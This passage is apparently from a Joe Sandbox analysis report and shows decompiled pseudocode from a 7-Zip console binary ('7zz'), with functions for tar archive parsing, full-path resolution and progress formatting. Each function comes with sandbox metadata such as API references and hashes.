					 *((intOrPtr*)(_t251 + 0x68)) =  *((intOrPtr*)(_t251 + 0x68)) + 0x200;
					if(E00438E5B(_t253 - 0x24c) == 0) {
						__eflags =  *(_t253 + 0xf);
						if( *(_t253 + 0xf) == 0) {
							_push(_t251);
							_t219 = 0x64;
							E00438E71(_t253 - 0x24c, _t219);
							_push(_t251 + 0x18);
							_t181 = 8;
							_t114 = E00438E29(_t253 - 0x1e8);
							__eflags = _t114;
							if(_t114 == 0) {
								L26:
								_t109 = 1;
								goto L41;
							}
							_t242 = _t251 + 0x1c;
							_t115 = E00438E29(_t253 - 0x1e0, _t242);
							__eflags = _t115;
							if(_t115 == 0) {
								 *_t242 =  *_t242 & 0x00000000;
								__eflags =  *_t242;
							}
							_t243 = _t251 + 0x20;
							_t116 = E00438E29(_t253 - 0x1d8, _t243);
							__eflags = _t116;
							if(_t116 == 0) {
								 *_t243 =  *_t243 & 0x00000000;
								__eflags =  *_t243;
							}
							__eflags = (((( *(_t253 - 0x1d0) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cf) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ce) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cd) & 0x000000ff) - 0x80000000;
							_t124 = _t251 + 0x10;
							 *(_t253 + 0xc) = _t124;
							if((((( *(_t253 - 0x1d0) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cf) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ce) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cd) & 0x000000ff) != 0x80000000) {
								_push(_t124);
								_t223 = 0xc;
								_t125 = E00438DD3(_t253 - 0x1d0, _t223, _t251);
								__eflags = _t125;
								if(_t125 == 0) {
									goto L26;
								}
								goto L22;
							} else {
								_t176 =  *(_t253 + 0xc);
								 *_t176 = ((( *(_t253 - 0x1c8) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c7) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c6) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c5) & 0x000000ff;
								_t176[1] = ((( *(_t253 - 0x1cc) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cb) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ca) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c9) & 0x000000ff;
								L22:
								_push(_t251 + 0x24);
								_t127 = E00438E29(_t253 - 0x1c4, 0xc);
								__eflags = _t127;
								if(_t127 == 0) {
									goto L26;
								}
								_t129 = E00438E29(_t253 - 0x1b8, _t253 - 0x24);
								__eflags = _t129;
								if(_t129 == 0) {
									goto L26;
								}
								E0046C5C0(_t253 - 0x1b8,  *0x48d374, _t181);
								 *((char*)(_t251 + 0x5c)) =  *((intOrPtr*)(_t253 - 0x1b0));
								_push(_t251 + 0x30);
								_t226 = 0x64;
								E00438E71(_t253 - 0x1af, _t226);
								_t244 = _t251 + 0x54;
								E0046C5C0(_t244, _t253 - 0x14b, _t181);
								_push(_t251 + 0x3c);
								_t227 = 0x20;
								E00438E71(_t253 - 0x143, _t227);
								_push(_t251 + 0x48);
								_t228 = 0x20;
								_t140 = E00438E71(_t253 - 0x123, _t228);
								__eflags =  *((char*)(_t253 - 0x103));
								 *((char*)(_t251 + 0x5d)) = _t140 & 0xffffff00 |  *((char*)(_t253 - 0x103)) != 0x00000000;
								_t143 = E00438E29(_t253 - 0x103, _t251 + 0x28);
								__eflags = _t143;
								if(_t143 == 0) {
									goto L26;
								}
								__eflags =  *((char*)(_t253 - 0xfb));
								 *((char*)(_t251 + 0x5e)) = _t143 & 0xffffff00 |  *((char*)(_t253 - 0xfb)) != 0x00000000;
								_t146 = E00438E29(_t253 - 0xfb, _t251 + 0x2c);
								__eflags = _t146;
								if(_t146 != 0) {
									 *((intOrPtr*)(_t253 - 0x1c)) = 0;
									 *(_t253 - 0x18) = 0;
									 *((intOrPtr*)(_t253 - 0x14)) = 0;
									E00401EEE(_t253 - 0x1c, 3);
									 *((intOrPtr*)(_t253 - 4)) = 0;
									E00438E71(_t253 - 0xf3, 0x9b, _t253 - 0x1c);
									__eflags =  *(_t253 - 0x18);
									if( *(_t253 - 0x18) == 0) {
										L33:
										__eflags =  *((char*)(_t251 + 0x5c)) - 0x31;
										if( *((char*)(_t251 + 0x5c)) == 0x31) {
											_t153 =  *(_t253 + 0xc);
											 *_t153 = 0;
											_t153[1] = 0;
										}
										_t204 = 0;
										_t150 = 0;
										__eflags = 0;
										do {
											_t204 = _t204 + ( *(_t253 + _t150 - 0x24c) & 0x000000ff);
											_t150 = _t150 + 1;
											__eflags = _t150 - 0x200;
										} while (_t150 < 0x200);
										__eflags = _t204 -  *((intOrPtr*)(_t253 - 0x24));
										if(_t204 ==  *((intOrPtr*)(_t253 - 0x24))) {
											__eflags = 0;
											 *((char*)( *((intOrPtr*)(_t253 - 0x20)))) = 1;
										} else {
											_push(1);
											_pop(0);
										}
										E00407A18( *((intOrPtr*)(_t253 - 0x1c)));
										_t109 = 0;
										goto L41;
									}
									_t154 = 0;
									__eflags = 0;
									while(1) {
										_t233 =  *0x48d380; // 0x48d394
										__eflags =  *((intOrPtr*)(_t244 + _t154)) -  *((intOrPtr*)(_t233 + _t154));
										if( *((intOrPtr*)(_t244 + _t154)) !=  *((intOrPtr*)(_t233 + _t154))) {
											goto L33;
										}
										_t154 = _t154 + 1;
										__eflags = _t154 - 5;
										if(_t154 < 5) {
											continue;
										}
										__eflags =  *((char*)(_t251 + 0x5c)) - 0x4c;
										if(__eflags != 0) {
											_push(E00438EA7(_t253 - 0x40, __eflags, 0x2f));
											 *((char*)(_t253 - 4)) = 1;
											_t156 = L0040AFFE(_t253 - 0x4c, _t253 - 0x1c);
											_push(_t251);
											 *((char*)(_t253 - 4)) = 2;
											_t157 = L0040AFFE(_t253 - 0x34, _t156);
											 *((char*)(_t253 - 4)) = 3;
											L00407E17(_t251, _t157);
											E00407A18( *((intOrPtr*)(_t253 - 0x34)));
											E00407A18( *((intOrPtr*)(_t253 - 0x4c)));
											E00407A18( *((intOrPtr*)(_t253 - 0x40)));
										}
										goto L33;
									}
									goto L33;
								}
								goto L26;
							}
						}
						_push("There are data after end of archive");
						goto L12;
					}
					 *(_t253 + 0xf) = 1;
					 *((intOrPtr*)(_t253 - 0x10)) = 0x200;
					_t109 = E0040FA74( *((intOrPtr*)(_t253 - 0x28)), _t253 - 0x24c, _t253 - 0x10);
					if(_t109 == 0) {
						continue;
					}
					goto L41;
				}
				__eflags =  *(_t253 + 0xf);
				if( *(_t253 + 0xf) != 0) {
					goto L13;
				}
				_push("There are no trailing zero-filled records");
				goto L12;
			}



































                                                                                                                                    0x00438a33
                                                                                                                                    0x00438a41
                                                                                                                                    0x00438a44
                                                                                                                                    0x00438a48
                                                                                                                                    0x00438a4d
                                                                                                                                    0x00438a56
                                                                                                                                    0x00438a59
                                                                                                                                    0x00438a5c
                                                                                                                                    0x00438a69
                                                                                                                                    0x00438a6c
                                                                                                                                    0x00438a73
                                                                                                                                    0x00438dc2
                                                                                                                                    0x00438dc8
                                                                                                                                    0x00438dd0
                                                                                                                                    0x00438dd0
                                                                                                                                    0x00438a79
                                                                                                                                    0x00438a7c
                                                                                                                                    0x00438a85
                                                                                                                                    0x00438ac8
                                                                                                                                    0x00438ada
                                                                                                                                    0x00438adc
                                                                                                                                    0x00438ae1
                                                                                                                                    0x00438ae1
                                                                                                                                    0x00000000
                                                                                                                                    0x00438ae1
                                                                                                                                    0x00438a87
                                                                                                                                    0x00438a97
                                                                                                                                    0x00438acf
                                                                                                                                    0x00438ad3
                                                                                                                                    0x00438ae8
                                                                                                                                    0x00438aeb
                                                                                                                                    0x00438af2
                                                                                                                                    0x00438b00
                                                                                                                                    0x00438b03
                                                                                                                                    0x00438b06
                                                                                                                                    0x00438b0b
                                                                                                                                    0x00438b0d
                                                                                                                                    0x00438cdc
                                                                                                                                    0x00438cde
                                                                                                                                    0x00000000
                                                                                                                                    0x00438cde
                                                                                                                                    0x00438b13
                                                                                                                                    0x00438b1f
                                                                                                                                    0x00438b24
                                                                                                                                    0x00438b26
                                                                                                                                    0x00438b28
                                                                                                                                    0x00438b28
                                                                                                                                    0x00438b28
                                                                                                                                    0x00438b2b
                                                                                                                                    0x00438b37
                                                                                                                                    0x00438b3c
                                                                                                                                    0x00438b3e
                                                                                                                                    0x00438b40
                                                                                                                                    0x00438b40
                                                                                                                                    0x00438b40
                                                                                                                                    0x00438b6e
                                                                                                                                    0x00438b73
                                                                                                                                    0x00438b76
                                                                                                                                    0x00438b79
                                                                                                                                    0x00438be5
                                                                                                                                    0x00438be8
                                                                                                                                    0x00438bef
                                                                                                                                    0x00438bf4
                                                                                                                                    0x00438bf6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00438b7b
                                                                                                                                    0x00438bd9
                                                                                                                                    0x00438bde
                                                                                                                                    0x00438be0
                                                                                                                                    0x00438bfc
                                                                                                                                    0x00438c05
                                                                                                                                    0x00438c09
                                                                                                                                    0x00438c0e
                                                                                                                                    0x00438c10
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00438c22
                                                                                                                                    0x00438c27
                                                                                                                                    0x00438c29
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00438c3d
                                                                                                                                    0x00438c4b
                                                                                                                                    0x00438c51
                                                                                                                                    0x00438c54
                                                                                                                                    0x00438c5b
                                                                                                                                    0x00438c66
                                                                                                                                    0x00438c6c
                                                                                                                                    0x00438c7d
                                                                                                                                    0x00438c80
                                                                                                                                    0x00438c81
                                                                                                                                    0x00438c8f
                                                                                                                                    0x00438c92
                                                                                                                                    0x00438c93
                                                                                                                                    0x00438c98
                                                                                                                                    0x00438caa
                                                                                                                                    0x00438cb1
                                                                                                                                    0x00438cb6
                                                                                                                                    0x00438cb8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00438cba
                                                                                                                                    0x00438ccc
                                                                                                                                    0x00438cd3
                                                                                                                                    0x00438cd8
                                                                                                                                    0x00438cda
                                                                                                                                    0x00438ceb
                                                                                                                                    0x00438cee
                                                                                                                                    0x00438cf1
                                                                                                                                    0x00438cf4
                                                                                                                                    0x00438d08
                                                                                                                                    0x00438d0b
                                                                                                                                    0x00438d10
                                                                                                                                    0x00438d13
                                                                                                                                    0x00438d81
                                                                                                                                    0x00438d81
                                                                                                                                    0x00438d85
                                                                                                                                    0x00438d87
                                                                                                                                    0x00438d8a
                                                                                                                                    0x00438d8c
                                                                                                                                    0x00438d8c
                                                                                                                                    0x00438d8f
                                                                                                                                    0x00438d91
                                                                                                                                    0x00438d91
                                                                                                                                    0x00438d93
                                                                                                                                    0x00438d9b
                                                                                                                                    0x00438d9d
                                                                                                                                    0x00438d9e
                                                                                                                                    0x00438d9e
                                                                                                                                    0x00438da5
                                                                                                                                    0x00438da8
                                                                                                                                    0x00438db2
                                                                                                                                    0x00438db4
                                                                                                                                    0x00438daa
                                                                                                                                    0x00438daa
                                                                                                                                    0x00438dac
                                                                                                                                    0x00438dac
                                                                                                                                    0x00438dba
                                                                                                                                    0x00438dc0
                                                                                                                                    0x00000000
                                                                                                                                    0x00438dc0
                                                                                                                                    0x00438d15
                                                                                                                                    0x00438d15
                                                                                                                                    0x00438d17
                                                                                                                                    0x00438d17
                                                                                                                                    0x00438d20
                                                                                                                                    0x00438d23
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00438d25
                                                                                                                                    0x00438d26
                                                                                                                                    0x00438d29
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00438d2b
                                                                                                                                    0x00438d2f
                                                                                                                                    0x00438d3b
                                                                                                                                    0x00438d42
                                                                                                                                    0x00438d46
                                                                                                                                    0x00438d4b
                                                                                                                                    0x00438d51
                                                                                                                                    0x00438d55
                                                                                                                                    0x00438d5d
                                                                                                                                    0x00438d61
                                                                                                                                    0x00438d69
                                                                                                                                    0x00438d71
                                                                                                                                    0x00438d79
                                                                                                                                    0x00438d7e
                                                                                                                                    0x00000000
                                                                                                                                    0x00438d2f
                                                                                                                                    0x00000000
                                                                                                                                    0x00438d17
                                                                                                                                    0x00000000
                                                                                                                                    0x00438cda
                                                                                                                                    0x00438b79
                                                                                                                                    0x00438ad5
                                                                                                                                    0x00000000
                                                                                                                                    0x00438ad5
                                                                                                                                    0x00438aa6
                                                                                                                                    0x00438aaa
                                                                                                                                    0x00438aad
                                                                                                                                    0x00438ab4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00438ab6
                                                                                                                                    0x00438abb
                                                                                                                                    0x00438abf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00438ac1
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    • There is no correct record at the end of archive, xrefs: 00438AC8
                                                                                                                                    • There are data after end of archive, xrefs: 00438AD5
                                                                                                                                    • There are no trailing zero-filled records, xrefs: 00438AC1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: There are data after end of archive$There are no trailing zero-filled records$There is no correct record at the end of archive
                                                                                                                                    • API String ID: 3519838083-3898197850
                                                                                                                                    • Opcode ID: 3ddcd38165be4bcf837a9b22d6199cdc7b4c165d71977855116068728752eb8a
                                                                                                                                    • Instruction ID: 8a8560e65d813f7a5cec42f637569da3f69274a6d4fc9a9a4ce8affac6b4ac77
                                                                                                                                    • Opcode Fuzzy Hash: 3ddcd38165be4bcf837a9b22d6199cdc7b4c165d71977855116068728752eb8a
                                                                                                                                    • Instruction Fuzzy Hash: 92B10070D003599EDB21EB24C891BEEFBB4AF58304F0454AFF445A3282DB78AA49CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040A28C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E0040A28C(WCHAR* __ecx, WCHAR** __edx) {
				intOrPtr* _t69;
				signed char _t71;
				void* _t74;
				void* _t78;
				void* _t83;
				signed char _t89;
				WCHAR* _t92;
				WCHAR* _t94;
				long _t95;
				WCHAR* _t96;
				signed int _t97;
				WCHAR* _t100;
				long _t103;
				WCHAR* _t105;
				long _t106;
				WCHAR* _t115;
				signed int _t133;
				signed int _t136;
				WCHAR* _t138;
				signed int _t148;
				WCHAR* _t149;
				signed int* _t153;
				WCHAR** _t156;
				void* _t158;

				L0046B890(0x473b7c, _t158);
				_t156 = __edx;
				 *(_t158 - 0x10) = __ecx;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((short*)( *((intOrPtr*)(__edx)))) = 0;
				if( *0x490a7c == 0) {
					 *((intOrPtr*)(_t158 - 0x28)) = 0;
					 *((intOrPtr*)(_t158 - 0x24)) = 0;
					 *((intOrPtr*)(_t158 - 0x20)) = 0;
					E00401EEE(_t158 - 0x28, 3);
					 *(_t158 - 4) = 0;
					_t69 = E00409AD5(_t158 - 0x4c,  *(_t158 - 0x10));
					_t153 =  *(_t158 + 8);
					 *(_t158 - 4) = 1;
					_t71 = E0040A20F( *_t69, _t158 - 0x28, _t153);
					asm("sbb bl, bl");
					 *(_t158 - 4) =  *(_t158 - 4) & 0x00000000;
					E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
					__eflags =  ~_t71 + 1;
					if( ~_t71 + 1 == 0) {
						_t74 = L0040AF39(_t158 - 0x28, _t158 - 0x4c,  *_t153);
						 *(_t158 - 4) = 2;
						E004098A8(_t74);
						 *(_t158 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
						_t78 = L0040AF18(_t158 - 0x28, _t158 - 0x58,  *_t153);
						 *(_t158 - 4) = 5;
						E004098A8(_t78);
						 *(_t158 - 4) = 7;
						E00407A18( *((intOrPtr*)(_t158 - 0x58)));
						 *_t153 =  *(_t158 - 0x30);
						_push(_t158 - 0x40);
						_t83 = L0040B0A0(_t158 - 0x4c, _t158 - 0x34);
						 *(_t158 - 4) = 8;
						E00401E26(_t156, _t83);
						E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
						E00407A18( *((intOrPtr*)(_t158 - 0x40)));
						E00407A18( *((intOrPtr*)(_t158 - 0x34)));
						E00407A18( *((intOrPtr*)(_t158 - 0x28)));
						goto L26;
					} else {
						E00407A18( *((intOrPtr*)(_t158 - 0x28)));
						goto L24;
					}
				} else {
					 *(_t158 - 0x18) = 0;
					if( *((intOrPtr*)(__edx + 8)) <= 0x104) {
						E00401E9A(__edx, 0x104);
					}
					_t92 =  *_t156;
					 *(_t158 - 0x1c) = _t92;
					 *(_t158 - 0x14) = GetFullPathNameW( *(_t158 - 0x10), 0x105, _t92, _t158 - 0x18);
					_t94 =  *_t156;
					_t133 = 0;
					if( *_t94 != 0) {
						_t149 = _t94;
						do {
							_t133 = _t133 + 1;
							_t149 =  &(_t149[1]);
						} while ( *_t149 != 0);
					}
					_t94[_t133] = 0;
					_t95 =  *(_t158 - 0x14);
					_t156[1] = _t133;
					if(_t95 == 0) {
						L24:
						_t89 = 0;
					} else {
						if(_t95 < 0x104) {
							L15:
							_t96 =  *(_t158 - 0x18);
							if(_t96 != 0) {
								_t97 = _t96 -  *(_t158 - 0x1c);
								__eflags = _t97;
								 *( *(_t158 + 8)) = _t97 >> 1;
							} else {
								_t100 =  *(_t158 - 0x10);
								_t136 = 0;
								while( *_t100 != 0) {
									_t136 = _t136 + 1;
									_t100 =  &(_t100[1]);
								}
								 *( *(_t158 + 8)) = _t136;
							}
							E0040A4A1( *(_t158 - 0x10), _t156, __eflags);
							L26:
							_t89 = 1;
						} else {
							_t103 = _t95 + 1;
							 *(_t158 - 0x14) = _t103;
							_t104 = _t103 + 1;
							if(_t103 + 1 >= _t156[2]) {
								E00401E9A(_t156, _t104);
							}
							_t105 =  *_t156;
							 *(_t158 - 0x1c) = _t105;
							_t106 = GetFullPathNameW( *(_t158 - 0x10),  *(_t158 - 0x14), _t105, _t158 - 0x18);
							_t138 =  *_t156;
							_t148 = 0;
							if( *_t138 != 0) {
								_t115 = _t138;
								do {
									_t148 = _t148 + 1;
									_t115 =  &(_t115[1]);
								} while ( *_t115 != 0);
							}
							_t138[_t148] = 0;
							_t156[1] = _t148;
							if(_t106 == 0 || _t106 >  *(_t158 - 0x14)) {
								goto L24;
							} else {
								goto L15;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t158 - 0xc));
				return _t89;
			}



























                                                                                                                                    0x0040a291
                                                                                                                                    0x0040a29b
                                                                                                                                    0x0040a2a0
                                                                                                                                    0x0040a2a5
                                                                                                                                    0x0040a2a8
                                                                                                                                    0x0040a2b2
                                                                                                                                    0x0040a3a0
                                                                                                                                    0x0040a3a3
                                                                                                                                    0x0040a3a6
                                                                                                                                    0x0040a3a9
                                                                                                                                    0x0040a3b4
                                                                                                                                    0x0040a3b7
                                                                                                                                    0x0040a3be
                                                                                                                                    0x0040a3c7
                                                                                                                                    0x0040a3cb
                                                                                                                                    0x0040a3d7
                                                                                                                                    0x0040a3d9
                                                                                                                                    0x0040a3df
                                                                                                                                    0x0040a3e4
                                                                                                                                    0x0040a3e7
                                                                                                                                    0x0040a402
                                                                                                                                    0x0040a40c
                                                                                                                                    0x0040a410
                                                                                                                                    0x0040a418
                                                                                                                                    0x0040a41c
                                                                                                                                    0x0040a42b
                                                                                                                                    0x0040a435
                                                                                                                                    0x0040a439
                                                                                                                                    0x0040a441
                                                                                                                                    0x0040a445
                                                                                                                                    0x0040a44e
                                                                                                                                    0x0040a453
                                                                                                                                    0x0040a45a
                                                                                                                                    0x0040a462
                                                                                                                                    0x0040a466
                                                                                                                                    0x0040a46e
                                                                                                                                    0x0040a476
                                                                                                                                    0x0040a47e
                                                                                                                                    0x0040a486
                                                                                                                                    0x00000000
                                                                                                                                    0x0040a3e9
                                                                                                                                    0x0040a3ec
                                                                                                                                    0x00000000
                                                                                                                                    0x0040a3f1
                                                                                                                                    0x0040a2b8
                                                                                                                                    0x0040a2bd
                                                                                                                                    0x0040a2c3
                                                                                                                                    0x0040a2c8
                                                                                                                                    0x0040a2c8
                                                                                                                                    0x0040a2cd
                                                                                                                                    0x0040a2d8
                                                                                                                                    0x0040a2e7
                                                                                                                                    0x0040a2ea
                                                                                                                                    0x0040a2ec
                                                                                                                                    0x0040a2f1
                                                                                                                                    0x0040a2f3
                                                                                                                                    0x0040a2f5
                                                                                                                                    0x0040a2f5
                                                                                                                                    0x0040a2f7
                                                                                                                                    0x0040a2f8
                                                                                                                                    0x0040a2f5
                                                                                                                                    0x0040a2fd
                                                                                                                                    0x0040a301
                                                                                                                                    0x0040a306
                                                                                                                                    0x0040a309
                                                                                                                                    0x0040a3f2
                                                                                                                                    0x0040a3f2
                                                                                                                                    0x0040a30f
                                                                                                                                    0x0040a314
                                                                                                                                    0x0040a365
                                                                                                                                    0x0040a365
                                                                                                                                    0x0040a36a
                                                                                                                                    0x0040a382
                                                                                                                                    0x0040a382
                                                                                                                                    0x0040a38a
                                                                                                                                    0x0040a36c
                                                                                                                                    0x0040a36c
                                                                                                                                    0x0040a36f
                                                                                                                                    0x0040a371
                                                                                                                                    0x0040a376
                                                                                                                                    0x0040a378
                                                                                                                                    0x0040a378
                                                                                                                                    0x0040a37e
                                                                                                                                    0x0040a37e
                                                                                                                                    0x0040a391
                                                                                                                                    0x0040a48e
                                                                                                                                    0x0040a48e
                                                                                                                                    0x0040a316
                                                                                                                                    0x0040a316
                                                                                                                                    0x0040a317
                                                                                                                                    0x0040a31a
                                                                                                                                    0x0040a31e
                                                                                                                                    0x0040a323
                                                                                                                                    0x0040a323
                                                                                                                                    0x0040a328
                                                                                                                                    0x0040a332
                                                                                                                                    0x0040a338
                                                                                                                                    0x0040a33a
                                                                                                                                    0x0040a33c
                                                                                                                                    0x0040a341
                                                                                                                                    0x0040a343
                                                                                                                                    0x0040a345
                                                                                                                                    0x0040a345
                                                                                                                                    0x0040a347
                                                                                                                                    0x0040a348
                                                                                                                                    0x0040a345
                                                                                                                                    0x0040a34d
                                                                                                                                    0x0040a353
                                                                                                                                    0x0040a356
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040a356
                                                                                                                                    0x0040a314
                                                                                                                                    0x0040a309
                                                                                                                                    0x0040a496
                                                                                                                                    0x0040a49e

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040A291
                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000105,00000104,00000002,00000000,59@,00000000), ref: 0040A2E5
                                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,00000001,00000002), ref: 0040A338
                                                                                                                                      • Part of subcall function 004098A8: AreFileApisANSI.KERNEL32(?,?,?,0040AA48,00000003,?,?,?,?,?,?,?), ref: 004098B4
                                                                                                                                      • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FullH_prologNamePath$ApisFile
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 1887739612-2780377667
                                                                                                                                    • Opcode ID: e984556f7341f834eb6f76e66d3e67b41fabcb05650be67429daeab63fa82d0f
                                                                                                                                    • Instruction ID: 0a5654e161e1f716a3f046905b73ad11417bb6cb1d0641c1b6b0c0ecaf941a14
                                                                                                                                    • Opcode Fuzzy Hash: e984556f7341f834eb6f76e66d3e67b41fabcb05650be67429daeab63fa82d0f
                                                                                                                                    • Instruction Fuzzy Hash: 53619A71E40209DFCB01EFA5C8419EEBBB5EF59304F10843EE452B7291DB785A518BAA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004060D4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004060D4(void* __ecx) {
				unsigned int _v8;
				void* _v12;
				char _v43;
				char _v44;
				char _v160;
				void* _t50;
				void* _t53;
				unsigned int _t54;
				intOrPtr* _t55;
				intOrPtr _t60;
				int _t62;
				int _t69;
				void* _t72;
				signed int _t73;
				signed int _t79;
				unsigned int _t80;
				void _t81;
				char _t85;
				unsigned int _t86;
				signed int _t87;
				signed int _t92;
				signed int _t97;
				signed int _t98;
				void* _t103;
				void* _t104;
				unsigned int _t105;
				signed int _t106;
				void* _t107;
				void* _t108;
				signed int _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				void* _t118;
				void* _t121;
				void* _t122;
				void* _t123;

				_t121 = __ecx;
				_t110 =  *(__ecx + 0x18);
				_t71 =  *(__ecx + 0x1c);
				if(( *(__ecx + 0x18) |  *(__ecx + 0x1c)) != 0) {
					_t50 = L0046B300(L0046B370( *((intOrPtr*)(__ecx + 0x10)),  *((intOrPtr*)(__ecx + 0x14)), 0x64, 0), _t103, _t110, _t71);
					_t111 = _t103;
				} else {
					_t50 = 0;
					_t111 = 0;
				}
				_t104 = 0xa;
				L004075FF( &_v44, _t104, _t50, _t111);
				_t53 = L0046B400( &_v44);
				 *((char*)(_t122 + _t53 - 0x28)) = 0x25;
				 *(_t122 + _t53 - 0x27) =  *(_t122 + _t53 - 0x27) & 0x00000000;
				_t54 = _t53 + 1;
				_v8 = _t54;
				_t105 = 4;
				if(_t54 > _t105) {
					_t105 = _t54;
				}
				_t79 =  *(_t121 + 0x20);
				_t106 = _t105 + 2;
				if(_t106 < _t79) {
					_t106 = _t79;
				}
				_t72 =  &_v160;
				_v12 = _t72;
				if( *(_t121 + 0x20) == 0) {
					if(_t106 > 0) {
						_t97 = _t106;
						_t118 =  &_v160;
						_t98 = _t97 >> 2;
						_t69 = memset(_t118, 0x20202020, _t98 << 2);
						_t72 = _t122 + _t106 - 0x9c;
						_v12 = _t72;
						memset(_t118 + _t98, _t69, (_t97 & 0x00000003) << 0);
						_t123 = _t123 + 0x18;
						_t54 = _v8;
					}
					 *(_t121 + 0x20) = _t106;
				}
				_t80 =  *(_t121 + 0x20);
				if(_t80 > 0) {
					_t115 = _t72;
					_t73 = _t80;
					_t92 = _t80 >> 2;
					memset(_t115 + _t92, memset(_t115, 0x8080808, _t92 << 2), (_t73 & 0x00000003) << 0);
					_t123 = _t123 + 0x18;
					_t72 = _v12 + _t73;
					_t54 = _v8;
				}
				 *(_t121 + 0x20) = _t106;
				if(_t54 < _t106) {
					_t109 = _t106 - _t54;
					_t86 = _t109;
					_t112 = _t72;
					_v8 = _t86;
					_t87 = _t86 >> 2;
					_t62 = memset(_t112, 0x20202020, _t87 << 2);
					_t72 = _t72 + _t109;
					memset(_t112 + _t87, _t62, (_t109 & 0x00000003) << 0);
				}
				_t81 = _v44;
				_t107 = _t72 + 1;
				 *_t72 = _t81;
				_t55 =  &_v43;
				if(_t81 != 0) {
					_t108 = _t107 -  &_v43;
					do {
